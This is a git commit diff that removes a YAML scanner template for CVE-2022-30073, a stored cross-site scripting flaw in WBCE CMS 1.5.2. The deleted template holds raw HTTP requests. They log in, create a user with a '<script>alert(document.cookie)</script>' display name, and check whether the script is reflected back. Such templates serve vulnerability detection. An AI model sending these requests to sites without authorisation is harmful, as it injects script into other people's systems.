Delete CVE-2022-30073.yaml

2022-07-14 16:21:52 +05:30 · 2022-07-14 16:21:52 +05:30 · 9231d1211b
parent 87e9fa3ac2
commit 9231d1211b
1 changed files with 0 additions and 68 deletions
--- a/cves/2022/CVE-2022-30073.yaml
+++ b/cves/2022/CVE-2022-30073.yaml
@ -1,68 +0,0 @@
-id: CVE-2022-30073
-
-info:
-  name: WBCE CMS v1.5.2 XSS Stored
-  author: arafatansari
-  severity: medium
-  description: |
-    WBCE CMS 1.5.2 is vulnerable to Cross Site Scripting (XSS) via \admin\user\save.php Display Name parameters.
-  reference:
-    - https://github.com/APTX-4879/CVE
-    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073
-    - https://github.com/APTX-4879/CVE/blob/main/CVE-2022-30073.pdf
-  classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
-    cvss-score: 5.4
-    cve-id: CVE-2022-30073
-    cwe-id: CWE-79
-  metadata:
-    verified: "true"
-  tags: cve,cve2022,wbcecms,xss,authenticated
-
-requests:
-  - raw: 
-      - |
-        POST /wbce/admin/login/index.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-       
-        url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login
-
-      - |
-        GET /wbce/admin/users/index.php HTTP/1.1
-        Host: {{Hostname}}    
-        Content-Type: application/x-www-form-urlencoded 
-
-      - |
-        POST /wbce/admin/users/index.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
-        formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=temp123&password=tempbitch&password2=tempbitch&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=temp121%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=
-
-    cookie-reuse: true
-    extractors:
-      - type: regex
-        name: formtoken
-        part: body
-        internal: true
-        group: 1
-        regex:
-          - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
-
-
-    matchers-condition: and
-    matchers:
-      - type: word
-        part: body
-        words:
-          - 'value="<script>alert(document.cookie)</script>" class="wdt250'
-
-      - type: word
-        part: header
-        words:
-          - text/html
-
-      - type: status
-        status:
-          - 200